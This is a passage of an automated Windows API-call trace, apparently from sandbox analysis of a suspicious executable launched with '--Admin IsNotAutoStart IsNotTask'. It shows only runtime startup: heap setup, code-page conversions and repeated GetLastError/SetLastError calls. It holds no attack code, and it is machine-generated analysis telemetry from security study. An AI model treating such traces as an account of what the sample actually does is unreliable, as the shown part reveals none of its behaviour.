hStdOutput=0x18ff84, hStdError=0x4058be)) [0158.912] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0158.912] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x3f0000 [0158.917] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0158.917] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0158.917] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0158.917] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0158.917] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0158.919] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x214) returned 0x3f07d0 [0158.919] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0158.920] GetCurrentThreadId () returned 0x524 [0158.920] GetStartupInfoW (in: lpStartupInfo=0x18febc | out: lpStartupInfo=0x18febc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4054e5, hStdOutput=0x40581e, hStdError=0x3f07d0)) [0158.920] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x800) returned 0x3f09f0 [0158.920] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0158.920] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0158.920] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0158.921] SetHandleCount (uNumber=0x20) returned 0x20 [0158.921] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe\" --Admin IsNotAutoStart IsNotTask" [0158.921] GetEnvironmentStringsW () returned 0x271ef0* [0158.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0158.921] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x565) returned 0x3f11f8 [0158.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x3f11f8, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0158.921] FreeEnvironmentStringsW (penv=0x271ef0) returned 1 [0158.921] GetLastError () returned 0x5 [0158.922] SetLastError (dwErrCode=0x5) [0158.922] GetLastError () returned 0x5 [0158.922] SetLastError (dwErrCode=0x5) [0158.922] GetLastError () returned 0x5 [0158.922] SetLastError (dwErrCode=0x5) [0158.922] GetACP () returned 0x4e4 [0158.922] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x220) returned 0x3f1768 [0158.922] GetLastError () returned 0x5 [0158.922] SetLastError (dwErrCode=0x5) [0158.923] IsValidCodePage (CodePage=0x4e4) returned 1 [0158.923] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0158.923] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0158.923] GetLastError () returned 0x5 [0158.923] SetLastError (dwErrCode=0x5) [0158.923] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0158.923] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0158.923] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0158.923] GetLastError () returned 0x5 [0158.923] SetLastError (dwErrCode=0x5) [0158.923] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0158.923] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㫰븕@Ā") returned 256 [0158.923] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㫰븕@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0158.923] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㫰븕@Ā", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0158.924] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿX,íé\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0158.924] GetLastError () returned 0x5 [0158.924] SetLastError (dwErrCode=0x5) [0158.924] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0158.924] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㫰븕@Ā") returned 256 [0158.924] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㫰븕@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0158.924] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㫰븕@Ā", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0158.924] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿX,íé\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0158.924] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x4a6dc0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cusersabdoappdatalocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75fceb.tmp.exe")) returned 0x6c [0158.924] GetLastError () returned 0x0 [0158.925] SetLastError (dwErrCode=0x0) [0158.925] GetLastError () returned 0x0 [0158.925] SetLastError (dwErrCode=0x0) [0158.925] GetLastError () returned 0x0 [0158.925] SetLastError (dwErrCode=0x0) [0158.925] GetLastError () returned 0x0 [0158.925] SetLastError (dwErrCode=0x0) [0158.925] GetLastError () returned 0x0 [0158.925] SetLastError (dwErrCode=0x0) [0158.925] GetLastError () returned 0x0 [0158.925] SetLastError (dwErrCode=0x0) [0158.925] GetLastError () returned 0x0 [0158.925] SetLastError (dwErrCode=0x0) [0158.925] GetLastError () returned 0x0 [0158.926] SetLastError (dwErrCode=0x0) [0158.926] GetLastError () returned 0x0 [0158.926] SetLastError (dwErrCode=0x0) [0158.926] GetLastError () returned 0x0 [0158.926] SetLastError (dwErrCode=0x0) [0158.926] GetLastError () returned 0x0 [0158.926] SetLastError (dwErrCode=0x0) [0158.926] GetLastError () returned 0x0 [0158.926] SetLastError (dwErrCode=0x0) [0158.926] GetLastError () returned 0x0 [0158.926] SetLastError (dwErrCode=0x0) [0158.926] GetLastError () returned 0x0 [0158.927] SetLastError (dwErrCode=0x0) [0158.927] GetLastError () returned 0x0 [0158.927] SetLastError (dwErrCode=0x0) [0158.927] GetLastError () returned 0x0 [0158.927] SetLastError (dwErrCode=0x0) [0158.927] GetLastError () returned 0x0 [0158.927] SetLastError (dwErrCode=0x0) [0158.927] GetLastError () returned 0x0 [0158.927] SetLastError (dwErrCode=0x0) [0158.927] GetLastError () returned 0x0 [0158.927] SetLastError (dwErrCode=0x0) [0158.927] GetLastError () returned 0x0 [0158.927] SetLastError (dwErrCode=0x0) [0158.927] GetLastError () returned 0x0 [0158.927] SetLastError (dwErrCode=0x0) [0158.928] GetLastError () returned 0x0 [0158.928] SetLastError (dwErrCode=0x0) [0158.928] GetLastError () returned 0x0 [0158.928] SetLastError (dwErrCode=0x0) [0158.928] GetLastError () returned 0x0 [0158.928] SetLastError (dwErrCode=0x0) [0158.928] GetLastError () returned 0x0 [0158.928] SetLastError (dwErrCode=0x0) [0158.928] GetLastError () returned 0x0 [0158.928] SetLastError (dwErrCode=0x0) [0158.928] GetLastError () returned 0x0 [0158.929] SetLastError (dwErrCode=0x0) [0158.929] GetLastError () returned 0x0 [0158.929] SetLastError (dwErrCode=0x0) [0158.929] GetLastError () returned 0x0 [0158.929] SetLastError (dwErrCode=0x0) [0158.929] GetLastError () returned 0x0 [0158.929] SetLastError (dwErrCode=0x0) [0158.929] GetLastError () returned 0x0 [0158.929] SetLastError (dwErrCode=0x0) [0158.929] GetLastError () returned 0x0 [0158.929] SetLastError (dwErrCode=0x0) [0158.929] GetLastError () returned 0x0 [0158.930] SetLastError (dwErrCode=0x0) [0158.930] GetLastError () returned 0x0 [0158.930] SetLastError (dwErrCode=0x0) [0158.930] GetLastError () returned 0x0 [0158.930] SetLastError (dwErrCode=0x0) [0158.930] GetLastError () returned 0x0 [0158.930] SetLastError (dwErrCode=0x0) [0158.930] GetLastError () returned 0x0 [0158.930] SetLastError (dwErrCode=0x0) [0158.930] GetLastError () returned 0x0 [0158.930] SetLastError (dwErrCode=0x0) [0158.930] GetLastError () returned 0x0 [0158.931] SetLastError (dwErrCode=0x0) [0158.931] GetLastError () returned 0x0 [0158.931] SetLastError (dwErrCode=0x0) [0158.931] GetLastError () returned 0x0 [0158.931] SetLastError (dwErrCode=0x0) [0158.931] GetLastError () returned 0x0 [0158.931] SetLastError (dwErrCode=0x0) [0158.931] GetLastError () returned 0x0 [0158.931] SetLastError (dwErrCode=0x0) [0158.931] GetLastError () returned 0x0 [0158.931] SetLastError (dwErrCode=0x0) [0158.931] GetLastError () returned 0x0 [0158.932] SetLastError (dwErrCode=0x0) [0158.932] GetLastError () returned 0x0 [0158.932] SetLastError (dwErrCode=0x0) [0158.932] GetLastError () returned 0x0 [0158.932] SetLastError (dwErrCode=0x0) [0158.932] GetLastError () returned 0x0 [0158.932] SetLastError (dwErrCode=0x0) [0158.932] GetLastError () returned 0x0 [0158.932] SetLastError (dwErrCode=0x0) [0158.932] GetLastError () returned 0x0 [0158.933] SetLastError (dwErrCode=0x0) [0158.933] GetLastError () returned 0x0 [0158.933] SetLastError (dwErrCode=0x0) [0158.933] GetLastError () returned 0x0 [0158.933] SetLastError (dwErrCode=0x0) [0158.933] GetLastError () returned 0x0 [0158.933] SetLastError (dwErrCode=0x0) [0158.933] GetLastError () returned 0x0 [0158.933] SetLastError (dwErrCode=0x0) [0158.933] GetLastError () returned 0x0 [0158.933] SetLastError (dwErrCode=0x0) [0158.933] GetLastError () returned 0x0 [0158.934] SetLastError (dwErrCode=0x0) [0158.934] GetLastError () returned 0x0 [0158.934] SetLastError (dwErrCode=0x0) [0158.934] GetLastError () returned 0x0 [0158.934] SetLastError (dwErrCode=0x0) [0158.934] GetLastError () returned 0x0 [0158.934] SetLastError (dwErrCode=0x0) [0158.934] GetLastError () returned 0x0 [0158.934] SetLastError (dwErrCode=0x0) [0158.934] GetLastError () returned 0x0 [0158.935] SetLastError (dwErrCode=0x0) [0158.935] GetLastError () returned 0x0 [0158.935] SetLastError (dwErrCode=0x0) [0158.935] GetLastError () returned 0x0 [0158.935] SetLastError (dwErrCode=0x0) [0158.935] GetLastError () returned 0x0 [0158.935] SetLastError (dwErrCode=0x0) [0158.935] GetLastError () returned 0x0 [0158.935] SetLastError (dwErrCode=0x0) [0158.936] GetLastError () returned 0x0 [0158.936] SetLastError (dwErrCode=0x0) [0158.936] GetLastError () returned 0x0 [0158.936] SetLastError (dwErrCode=0x0) [0158.936] GetLastError () returned 0x0 [0158.936] SetLastError (dwErrCode=0x0) [0158.936] GetLastError () returned 0x0 [0158.936] SetLastError (dwErrCode=0x0) [0158.936] GetLastError () returned 0x0 [0158.936] SetLastError (dwErrCode=0x0) [0158.936] GetLastError () returned 0x0 [0158.937] SetLastError (dwErrCode=0x0) [0158.937] GetLastError () returned 0x0 [0158.937] SetLastError (dwErrCode=0x0) [0158.937] GetLastError () returned 0x0 [0158.937] SetLastError (dwErrCode=0x0) [0158.937] GetLastError () returned 0x0 [0158.937] SetLastError (dwErrCode=0x0) [0158.937] GetLastError () returned 0x0 [0158.938] SetLastError (dwErrCode=0x0) [0158.938] GetLastError () returned 0x0 [0158.938] SetLastError (dwErrCode=0x0) [0158.938] GetLastError () returned 0x0 [0158.938] SetLastError (dwErrCode=0x0) [0158.938] GetLastError () returned 0x0 [0158.938] SetLastError (dwErrCode=0x0) [0158.938] GetLastError () returned 0x0 [0158.938] SetLastError (dwErrCode=0x0) [0158.939] GetLastError () returned 0x0 [0158.939] SetLastError (dwErrCode=0x0) [0158.939] GetLastError () returned 0x0 [0158.939] SetLastError (dwErrCode=0x0) [0158.939] GetLastError () returned 0x0 [0158.939] SetLastError (dwErrCode=0x0) [0158.939] GetLastError () returned 0x0 [0158.939] SetLastError (dwErrCode=0x0) [0158.939] GetLastError () returned 0x0 [0158.939] SetLastError (dwErrCode=0x0) [0158.940] GetLastError () returned 0x0 [0158.940] SetLastError (dwErrCode=0x0) [0158.940] GetLastError () returned 0x0 [0158.940] SetLastError (dwErrCode=0x0) [0158.940] GetLastError () returned 0x0 [0158.940] SetLastError (dwErrCode=0x0) [0158.940] GetLastError () returned 0x0 [0158.940] SetLastError (dwErrCode=0x0) [0158.940] GetLastError () returned 0x0 [0158.940] SetLastError (dwErrCode=0x0) [0158.940] GetLastError () returned 0x0 [0158.941] SetLastError (dwErrCode=0x0) [0158.941] GetLastError () returned 0x0 [0158.941] SetLastError (dwErrCode=0x0) [0158.941] GetLastError () returned 0x0 [0158.941] SetLastError (dwErrCode=0x0) [0158.941] GetLastError () returned 0x0 [0158.941] SetLastError (dwErrCode=0x0) [0158.941] GetLastError () returned 0x0 [0158.942] SetLastError (dwErrCode=0x0) [0158.942] GetLastError () returned 0x0 [0158.942] SetLastError (dwErrCode=0x0) [0158.942] GetLastError () returned 0x0 [0158.942] SetLastError (dwErrCode=0x0) [0158.942] GetLastError () returned 0x0 [0158.942] SetLastError (dwErrCode=0x0) [0158.942] GetLastError () returned 0x0 [0158.942] SetLastError (dwErrCode=0x0) [0158.942] GetLastError () returned 0x0 [0158.942] 